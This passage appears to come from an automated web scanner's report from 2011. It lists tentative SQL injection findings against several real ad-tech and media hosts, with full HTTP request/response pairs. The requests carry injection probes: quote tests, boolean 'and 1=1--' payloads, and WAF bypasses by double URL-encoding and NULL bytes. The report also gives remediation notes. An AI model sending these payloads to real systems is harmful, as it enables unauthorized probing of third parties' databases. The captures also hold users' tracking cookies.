P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 3034
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 20:25:14 GMT
Connection: close
Cache-Control: no-store

<html>
<head>
<title>Runtime Error</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";fon
...[SNIP]...

Request 2

GET /adServer/GetInvite2.aspx?esi=true&bannerID=173542&referer=www.nbcmiami.com&1''=1 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://www.nbcmiami.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IXAICampaignCounter2203=0; IXAIControlCounter2203=0; IXAIBannerCounter170474=0; IXAIBanners2203=170474; IXAICampaignCounter2356=0; IXAIControlCounter2356=0; IXAIBannerCounter173161=0; IXAIBanners2356=173161; IXAI2356=FFT; IXAIinvited2356=true; lastInvite=1/18/2011 3:43:40 PM; DW=1fe494201295383799; IXAIBanners2405=173719; IXAIBannerCounter173719=1; IXAIFirstHit2405=2%2f7%2f2011+8%3a19%3a02+AM; IXAILastHit2405=2%2f7%2f2011+8%3a19%3a02+AM; IXAICampaignCounter2405=1; IXAICampaignCounter2249=0; IXAIControlCounter2249=0; IXAIBannerCounter170437=0; IXAIBanners2249=170437; IXAIBanners2382=173542; IXAIBannerCounter173542=1

Response 2

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Mon, 14 Feb 2011 20:25:15 GMT
Connection: close
Cache-Control: no-store
Content-Length: 22576

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...

1.5. http://core.insightexpressai.com/adServer/GetInvite2.aspx [referer parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The referer parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the referer parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /adServer/GetInvite2.aspx?esi=true&bannerID=173542&referer=www.nbcmiami.com' HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://www.nbcmiami.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IXAICampaignCounter2203=0; IXAIControlCounter2203=0; IXAIBannerCounter170474=0; IXAIBanners2203=170474; IXAICampaignCounter2356=0; IXAIControlCounter2356=0; IXAIBannerCounter173161=0; IXAIBanners2356=173161; IXAI2356=FFT; IXAIinvited2356=true; lastInvite=1/18/2011 3:43:40 PM; DW=1fe494201295383799; IXAIBanners2405=173719; IXAIBannerCounter173719=1; IXAIFirstHit2405=2%2f7%2f2011+8%3a19%3a02+AM; IXAILastHit2405=2%2f7%2f2011+8%3a19%3a02+AM; IXAICampaignCounter2405=1; IXAICampaignCounter2249=0; IXAIControlCounter2249=0; IXAIBannerCounter170437=0; IXAIBanners2249=170437; IXAIBanners2382=173542; IXAIBannerCounter173542=1

Response 1

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 3034
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 20:25:07 GMT
Connection: close
Cache-Control: no-store

<html>
<head>
<title>Runtime Error</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";fon
...[SNIP]...

Request 2

GET /adServer/GetInvite2.aspx?esi=true&bannerID=173542&referer=www.nbcmiami.com'' HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://www.nbcmiami.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IXAICampaignCounter2203=0; IXAIControlCounter2203=0; IXAIBannerCounter170474=0; IXAIBanners2203=170474; IXAICampaignCounter2356=0; IXAIControlCounter2356=0; IXAIBannerCounter173161=0; IXAIBanners2356=173161; IXAI2356=FFT; IXAIinvited2356=true; lastInvite=1/18/2011 3:43:40 PM; DW=1fe494201295383799; IXAIBanners2405=173719; IXAIBannerCounter173719=1; IXAIFirstHit2405=2%2f7%2f2011+8%3a19%3a02+AM; IXAILastHit2405=2%2f7%2f2011+8%3a19%3a02+AM; IXAICampaignCounter2405=1; IXAICampaignCounter2249=0; IXAIControlCounter2249=0; IXAIBannerCounter170437=0; IXAIBanners2249=170437; IXAIBanners2382=173542; IXAIBannerCounter173542=1

Response 2

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Mon, 14 Feb 2011 20:25:07 GMT
Connection: close
Cache-Control: no-store
Content-Length: 22562

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...

1.6. http://ct.buzzfeed.com/wd/UserWidget [amp;to parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ct.buzzfeed.com
Path:   /wd/UserWidget

Issue detail

The amp;to parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the amp;to parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wd/UserWidget?u=thedailybeast&amp;to=1%20and%201%3d1--%20&amp;or=vb&amp;wid=1&amp;cb=1297715604821 HTTP/1.1
Host: ct.buzzfeed.com
Proxy-Connection: keep-alive
Referer: http://www.thedailybeast.com/blogs-and-stories/2011-02-14/kenneth-lerer-the-stealth-partner-in-huffington-post-aol-sale/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Date: Mon, 14 Feb 2011 20:34:38 GMT
Expires: Mon, 14 Feb 2011 21:34:38 GMT
Server: lighttpd bf1
Content-Length: 10372

var BF_PARTNER = {
   partner_id: 0,
   ob_id: '75YGF7',
   partner_name: 'thedailybeast',
   partner_servers: ['174.129.88.189','174.129.88.248','174.129.141.101','75.101.240.172','174.129.135.197','174.129.
...[SNIP]...
oaded" : "true",
"track" : "39698"
}
;//end data
   try {
       BF_PARTNER.invisible=true;
       BF_PARTNER.track_page( BF_DATA.track );
   } catch(e) {
       console.log(e);
   }

})();

/* s 15:34:38 02/14/2011 */

Request 2

GET /wd/UserWidget?u=thedailybeast&amp;to=1%20and%201%3d2--%20&amp;or=vb&amp;wid=1&amp;cb=1297715604821 HTTP/1.1
Host: ct.buzzfeed.com
Proxy-Connection: keep-alive
Referer: http://www.thedailybeast.com/blogs-and-stories/2011-02-14/kenneth-lerer-the-stealth-partner-in-huffington-post-aol-sale/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Date: Mon, 14 Feb 2011 20:34:39 GMT
Expires: Mon, 14 Feb 2011 21:34:39 GMT
Server: lighttpd bf2
Content-Length: 10412

var BF_PARTNER = {
   partner_id: 0,
   ob_id: '75YGF7',
   partner_name: 'thedailybeast',
   partner_servers: ['174.129.88.189','174.129.88.248','174.129.141.101','75.101.240.172','174.129.135.197','174.129.
...[SNIP]...
oaded" : "true",
"track" : "39698"
}
;//end data
   try {
       BF_PARTNER.invisible=true;
       BF_PARTNER.track_page( BF_DATA.track );
   } catch(e) {
       console.log(e);
   }

})();

/* s 15:34:38 02/14/2011 */
/* g 15:34:39 02/14/2011 - sl=29399 */

1.7. http://ct.buzzfeed.com/wd/UserWidget [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ct.buzzfeed.com
Path:   /wd/UserWidget

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wd/UserWidget?u=thedailybeast&amp;to=1&amp;or=vb&amp;wid=1&amp;cb=1297715604821&1%20and%201%3d1--%20=1 HTTP/1.1
Host: ct.buzzfeed.com
Proxy-Connection: keep-alive
Referer: http://www.thedailybeast.com/blogs-and-stories/2011-02-14/kenneth-lerer-the-stealth-partner-in-huffington-post-aol-sale/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Date: Mon, 14 Feb 2011 20:35:07 GMT
Expires: Mon, 14 Feb 2011 21:35:07 GMT
Server: lighttpd bf2
Content-Length: 10412

var BF_PARTNER = {
   partner_id: 0,
   ob_id: '75YGF7',
   partner_name: 'thedailybeast',
   partner_servers: ['174.129.88.189','174.129.88.248','174.129.141.101','75.101.240.172','174.129.135.197','174.129.
...[SNIP]...
oaded" : "true",
"track" : "39698"
}
;//end data
   try {
       BF_PARTNER.invisible=true;
       BF_PARTNER.track_page( BF_DATA.track );
   } catch(e) {
       console.log(e);
   }

})();

/* s 15:35:05 02/14/2011 */
/* g 15:35:07 02/14/2011 - sl=29398 */

Request 2

GET /wd/UserWidget?u=thedailybeast&amp;to=1&amp;or=vb&amp;wid=1&amp;cb=1297715604821&1%20and%201%3d2--%20=1 HTTP/1.1
Host: ct.buzzfeed.com
Proxy-Connection: keep-alive
Referer: http://www.thedailybeast.com/blogs-and-stories/2011-02-14/kenneth-lerer-the-stealth-partner-in-huffington-post-aol-sale/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Date: Mon, 14 Feb 2011 20:35:06 GMT
Expires: Mon, 14 Feb 2011 21:35:06 GMT
Server: lighttpd bf1
Content-Length: 10372

var BF_PARTNER = {
   partner_id: 0,
   ob_id: '75YGF7',
   partner_name: 'thedailybeast',
   partner_servers: ['174.129.88.189','174.129.88.248','174.129.141.101','75.101.240.172','174.129.135.197','174.129.
...[SNIP]...
oaded" : "true",
"track" : "39698"
}
;//end data
   try {
       BF_PARTNER.invisible=true;
       BF_PARTNER.track_page( BF_DATA.track );
   } catch(e) {
       console.log(e);
   }

})();

/* s 15:35:06 02/14/2011 */

1.8. http://g-pixel.invitemedia.com/gmatcher [cver parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://g-pixel.invitemedia.com
Path:   /gmatcher

Issue detail

The cver parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the cver parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the cver request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /gmatcher?id=CAESEJO5OHX5lNGIHL7fEEEJ4-Y&cver=1%2527 HTTP/1.1
Host: g-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&mktid=3&mpid=1051206&fpid=-1&rnd=8244413144923814659&nu=n&sp=n
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=82d726c3-44ee-407c-85c4-39a0b0fc11ef; io_frequency="{\"8866\": [0+ 0+ 1296072684+ 1+ 1296072684+ 1]+ \"8171\": [0+ 0+ 1296660699+ 2+ 1296659838+ 2]+ \"9239\": [0+ 0+ 1297186251+ 1+ 1297186251+ 1]+ \"9376\": [0+ 0+ 1296659628+ 1+ 1296659628+ 1]+ \"8991\": [0+ 0+ 1297259805+ 3+ 1297259805+ 1]+ \"8733\": [0+ 0+ 1295634039+ 1+ 1295634039+ 1]+ \"9080\": [0+ 0+ 1297185928+ 1+ 1297185928+ 1]}"; impressions="{\"351309\": [1296660699+ \"6b326db0-ad1f-378f-98c3-837da14b6503\"+ 139089+ 81343+ 191]+ \"426723\": [1297259805+ \"d0c21fd3-dc6f-3508-8eb4-98c1ea2808ab\"+ 14387+ 57084+ 171]+ \"448883\": [1297186251+ \"2d72556f-3614-3865-9fd7-81648ddadef0\"+ 1770+ 21233+ 1365]+ \"429622\": [1295634039+ \"94ea05fe-2d4a-3bf7-a98e-3964b49408cd\"+ 83803+ 56236+ 46]+ \"417817\": [1296072684+ \"5b6de59f-cbbc-3ba4-8c51-0a4d6d7a0ec7\"+ 8863+ 40494+ 9173]+ \"456235\": [1296659628+ \"85680993-10ca-3909-9c72-ac737305e927\"+ 139089+ 81343+ 191]+ \"464239\": [1297185928+ \"5ca41985-3250-3989-8563-9e7bafc13c64\"+ 12149+ 59109+ 1365]+ \"426722\": [1297089042+ \"cf924af7-fb85-3eb0-b32f-8647072b898d\"+ 12202+ 59105+ 993]}"; partnerUID=eyIzOCI6ICJ1JTNENjI4NTE2MDUyNiUzQXMxJTNEMTI5NTQ4MjM3NjkxNyUzQXRzJTNEMTI5NzA4ODIyNDE1MCUzQXMyLjMzJTNEJTJDNjU3MCUyQzcwNTMlMkM2MzMzJTJDNTIyMyUyQzI3IiwgIjg0IjogWyJEVFFrZTdUOTk5WTRxWUpCIiwgdHJ1ZV19; frequency="{\"351309\": [1296660759+ 1+ 1296660699+ 2+ 1296659838+ 2]+ \"426723\": [1297274205+ 1+ 1297259805+ 1+ 1297259805+ 1]+ \"426722\": [1297103442+ 1+ 1297089042+ 2+ 1297089042+ 1]+ \"456235\": [1296659688+ 1+ 1296659628+ 1+ 1296659628+ 1]+ \"429622\": [1295893239+ 1+ 1295634039+ 1+ 1295634039+ 1]+ \"417817\": [1297368684+ 1+ 1296072684+ 1+ 1296072684+ 1]+ \"464239\": [1297214728+ 1+ 1297185928+ 1+ 1297185928+ 1]+ \"448883\": [1297272651+ 1+ 1297186251+ 1+ 1297186251+ 1]}"; subID="{}"; segments="17155|30304|10068|10069|40053|40050|39544|27804|22870|6761|38582,1298044270|40657|17277|24085|10102|5379|24391|39004|11262|5371|11265|10629|10660|10816|40057|8|28666|17440|27875|16733|26871|30211|39944|10641|29998|18125|39220|18129|24348|29994|24380|39650|5443|24810|27273|16034|24469|17163|10048|3771|39975|26901|16748|3779|18237|16490|16709|21886|28686|18134|22647|22994|21461|30353|7775|24461|24909|40589|20981|14947|28398|23667|27906|40046|18149|39646|17170|4465|38028|16713|3391|3783|24171|3392|23864|13746|3425|9800|38142|24352|38781|37720|2377|30530"; dp_rec="{\"1\": 1297089043+ \"3\": 1297527300+ \"2\": 1297185919+ \"4\": 1296660699}"; segments_p1="eJw1Uj1LQmEYTdN4uZM0Ci5tNTf2E8LFoKCpxaW1NagbRVEKBm4O0YeiZIRlSKl9ERVkoKVkZN6SBm8mVFRmJN33OU/LPZ7znudbxSomh2xtSoeYqpkMtAhBzKuZoM4A/Ung0ixca5rJ+AaNb4cIJcz0NktoFQcDBGf9pN5tQi33EdWojFVUxgiqvaTqE0j/zGXqnPKN8T0B/YP51yZ4Yxv8m/W5PPSFMLgnBfS9QA8UUX15HDSNadajZkURO1GzrR5p6hbDsOcg3zHg1EH2jAf2TNxssCzltoirklxCwYMK93GoWlGqj3HUrxTx+sSuLKN+yPOWgL8bPF8Wff50E23xOOot5KkeovN8nMX/I+UktouAU14qDTGiAzcYt2PIldgFT7Iv5UXufTuO6KRU2ojxdFTH0zHKnqiIOOXIcxVlL9xyR0cgl24j4NpJcXkn+Qox+G+C6KCkIu2DnTZWTcut1lh87SL4RBsNu1wOj9mKwHKATqddOPU+VB+on+mqixKEXcbv2ChJ553kyG0hXT6EjqvD8g+2ArFZRnhr0Nb2B9lxo48="; exchange_uid=eyIyIjogWyI0NzYwNDkyOTk5MjEzODAxNzMzIiwgNzM0MTcwXSwgIjQiOiBbIkNBRVNFSk81T0hYNWxOR0lITDdmRUVFSjQtWSIsIDczNDE4Ml19

Response 1

HTTP/1.0 200 OK
Content-Type: text/html
Connection: close
X-Error-Code: 503
Content-Length: 0


Request 2

GET /gmatcher?id=CAESEJO5OHX5lNGIHL7fEEEJ4-Y&cver=1%2527%2527 HTTP/1.1
Host: g-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&mktid=3&mpid=1051206&fpid=-1&rnd=8244413144923814659&nu=n&sp=n
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=82d726c3-44ee-407c-85c4-39a0b0fc11ef; io_frequency="{\"8866\": [0+ 0+ 1296072684+ 1+ 1296072684+ 1]+ \"8171\": [0+ 0+ 1296660699+ 2+ 1296659838+ 2]+ \"9239\": [0+ 0+ 1297186251+ 1+ 1297186251+ 1]+ \"9376\": [0+ 0+ 1296659628+ 1+ 1296659628+ 1]+ \"8991\": [0+ 0+ 1297259805+ 3+ 1297259805+ 1]+ \"8733\": [0+ 0+ 1295634039+ 1+ 1295634039+ 1]+ \"9080\": [0+ 0+ 1297185928+ 1+ 1297185928+ 1]}"; impressions="{\"351309\": [1296660699+ \"6b326db0-ad1f-378f-98c3-837da14b6503\"+ 139089+ 81343+ 191]+ \"426723\": [1297259805+ \"d0c21fd3-dc6f-3508-8eb4-98c1ea2808ab\"+ 14387+ 57084+ 171]+ \"448883\": [1297186251+ \"2d72556f-3614-3865-9fd7-81648ddadef0\"+ 1770+ 21233+ 1365]+ \"429622\": [1295634039+ \"94ea05fe-2d4a-3bf7-a98e-3964b49408cd\"+ 83803+ 56236+ 46]+ \"417817\": [1296072684+ \"5b6de59f-cbbc-3ba4-8c51-0a4d6d7a0ec7\"+ 8863+ 40494+ 9173]+ \"456235\": [1296659628+ \"85680993-10ca-3909-9c72-ac737305e927\"+ 139089+ 81343+ 191]+ \"464239\": [1297185928+ \"5ca41985-3250-3989-8563-9e7bafc13c64\"+ 12149+ 59109+ 1365]+ \"426722\": [1297089042+ \"cf924af7-fb85-3eb0-b32f-8647072b898d\"+ 12202+ 59105+ 993]}"; partnerUID=eyIzOCI6ICJ1JTNENjI4NTE2MDUyNiUzQXMxJTNEMTI5NTQ4MjM3NjkxNyUzQXRzJTNEMTI5NzA4ODIyNDE1MCUzQXMyLjMzJTNEJTJDNjU3MCUyQzcwNTMlMkM2MzMzJTJDNTIyMyUyQzI3IiwgIjg0IjogWyJEVFFrZTdUOTk5WTRxWUpCIiwgdHJ1ZV19; frequency="{\"351309\": [1296660759+ 1+ 1296660699+ 2+ 1296659838+ 2]+ \"426723\": [1297274205+ 1+ 1297259805+ 1+ 1297259805+ 1]+ \"426722\": [1297103442+ 1+ 1297089042+ 2+ 1297089042+ 1]+ \"456235\": [1296659688+ 1+ 1296659628+ 1+ 1296659628+ 1]+ \"429622\": [1295893239+ 1+ 1295634039+ 1+ 1295634039+ 1]+ \"417817\": [1297368684+ 1+ 1296072684+ 1+ 1296072684+ 1]+ \"464239\": [1297214728+ 1+ 1297185928+ 1+ 1297185928+ 1]+ \"448883\": [1297272651+ 1+ 1297186251+ 1+ 1297186251+ 1]}"; subID="{}"; segments="17155|30304|10068|10069|40053|40050|39544|27804|22870|6761|38582,1298044270|40657|17277|24085|10102|5379|24391|39004|11262|5371|11265|10629|10660|10816|40057|8|28666|17440|27875|16733|26871|30211|39944|10641|29998|18125|39220|18129|24348|29994|24380|39650|5443|24810|27273|16034|24469|17163|10048|3771|39975|26901|16748|3779|18237|16490|16709|21886|28686|18134|22647|22994|21461|30353|7775|24461|24909|40589|20981|14947|28398|23667|27906|40046|18149|39646|17170|4465|38028|16713|3391|3783|24171|3392|23864|13746|3425|9800|38142|24352|38781|37720|2377|30530"; dp_rec="{\"1\": 1297089043+ \"3\": 1297527300+ \"2\": 1297185919+ \"4\": 1296660699}"; segments_p1="eJw1Uj1LQmEYTdN4uZM0Ci5tNTf2E8LFoKCpxaW1NagbRVEKBm4O0YeiZIRlSKl9ERVkoKVkZN6SBm8mVFRmJN33OU/LPZ7znudbxSomh2xtSoeYqpkMtAhBzKuZoM4A/Ung0ixca5rJ+AaNb4cIJcz0NktoFQcDBGf9pN5tQi33EdWojFVUxgiqvaTqE0j/zGXqnPKN8T0B/YP51yZ4Yxv8m/W5PPSFMLgnBfS9QA8UUX15HDSNadajZkURO1GzrR5p6hbDsOcg3zHg1EH2jAf2TNxssCzltoirklxCwYMK93GoWlGqj3HUrxTx+sSuLKN+yPOWgL8bPF8Wff50E23xOOot5KkeovN8nMX/I+UktouAU14qDTGiAzcYt2PIldgFT7Iv5UXufTuO6KRU2ojxdFTH0zHKnqiIOOXIcxVlL9xyR0cgl24j4NpJcXkn+Qox+G+C6KCkIu2DnTZWTcut1lh87SL4RBsNu1wOj9mKwHKATqddOPU+VB+on+mqixKEXcbv2ChJ553kyG0hXT6EjqvD8g+2ArFZRnhr0Nb2B9lxo48="; exchange_uid=eyIyIjogWyI0NzYwNDkyOTk5MjEzODAxNzMzIiwgNzM0MTcwXSwgIjQiOiBbIkNBRVNFSk81T0hYNWxOR0lITDdmRUVFSjQtWSIsIDczNDE4Ml19

Response 2

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 14 Feb 2011 20:04:16 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 14-Feb-2011 20:03:56 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: exchange_uid=eyIyIjogWyI0NzYwNDkyOTk5MjEzODAxNzMzIiwgNzM0MTcwXSwgIjQiOiBbIkNBRVNFSk81T0hYNWxOR0lITDdmRUVFSjQtWSIsIDczNDE4Ml19; Domain=invitemedia.com; expires=Tue, 14-Feb-2012 20:04:16 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

1.9. http://g-pixel.invitemedia.com/gmatcher [frequency cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://g-pixel.invitemedia.com
Path:   /gmatcher

Issue detail

The frequency cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the frequency cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /gmatcher?id=CAESEJO5OHX5lNGIHL7fEEEJ4-Y&cver=1 HTTP/1.1
Host: g-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x2ff8fe.js&size_id=15&account_id=6005&site_id=12414&size=300x250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=82d726c3-44ee-407c-85c4-39a0b0fc11ef; exchange_uid=eyIyIjogWyI0NzYwNDkyOTk5MjEzODAxNzMzIiwgNzM0MTcwXSwgIjQiOiBbIkNBRVNFSk81T0hYNWxOR0lITDdmRUVFSjQtWSIsIDczNDE1MV19; io_frequency="{\"8866\": [0+ 0+ 1296072684+ 1+ 1296072684+ 1]+ \"8171\": [0+ 0+ 1296660699+ 2+ 1296659838+ 2]+ \"9239\": [0+ 0+ 1297186251+ 1+ 1297186251+ 1]+ \"9376\": [0+ 0+ 1296659628+ 1+ 1296659628+ 1]+ \"8991\": [0+ 0+ 1297259805+ 3+ 1297259805+ 1]+ \"8733\": [0+ 0+ 1295634039+ 1+ 1295634039+ 1]+ \"9080\": [0+ 0+ 1297185928+ 1+ 1297185928+ 1]}"; impressions="{\"351309\": [1296660699+ \"6b326db0-ad1f-378f-98c3-837da14b6503\"+ 139089+ 81343+ 191]+ \"426723\": [1297259805+ \"d0c21fd3-dc6f-3508-8eb4-98c1ea2808ab\"+ 14387+ 57084+ 171]+ \"448883\": [1297186251+ \"2d72556f-3614-3865-9fd7-81648ddadef0\"+ 1770+ 21233+ 1365]+ \"429622\": [1295634039+ \"94ea05fe-2d4a-3bf7-a98e-3964b49408cd\"+ 83803+ 56236+ 46]+ \"417817\": [1296072684+ \"5b6de59f-cbbc-3ba4-8c51-0a4d6d7a0ec7\"+ 8863+ 40494+ 9173]+ \"456235\": [1296659628+ \"85680993-10ca-3909-9c72-ac737305e927\"+ 139089+ 81343+ 191]+ \"464239\": [1297185928+ \"5ca41985-3250-3989-8563-9e7bafc13c64\"+ 12149+ 59109+ 1365]+ \"426722\": [1297089042+ \"cf924af7-fb85-3eb0-b32f-8647072b898d\"+ 12202+ 59105+ 993]}"; partnerUID=eyIzOCI6ICJ1JTNENjI4NTE2MDUyNiUzQXMxJTNEMTI5NTQ4MjM3NjkxNyUzQXRzJTNEMTI5NzA4ODIyNDE1MCUzQXMyLjMzJTNEJTJDNjU3MCUyQzcwNTMlMkM2MzMzJTJDNTIyMyUyQzI3IiwgIjg0IjogWyJEVFFrZTdUOTk5WTRxWUpCIiwgdHJ1ZV19; frequency="{\"351309\": [1296660759+ 1+ 1296660699+ 2+ 1296659838+ 2]+ \"426723\": [1297274205+ 1+ 1297259805+ 1+ 1297259805+ 1]+ \"426722\": [1297103442+ 1+ 1297089042+ 2+ 1297089042+ 1]+ \"456235\": [1296659688+ 1+ 1296659628+ 1+ 1296659628+ 1]+ \"429622\": [1295893239+ 1+ 1295634039+ 1+ 1295634039+ 1]+ \"417817\": [1297368684+ 1+ 1296072684+ 1+ 1296072684+ 1]+ \"464239\": [1297214728+ 1+ 1297185928+ 1+ 1297185928+ 1]+ \"448883\": [1297272651+ 1+ 1297186251+ 1+ 1297186251+ 1]}"%00'; subID="{}"; 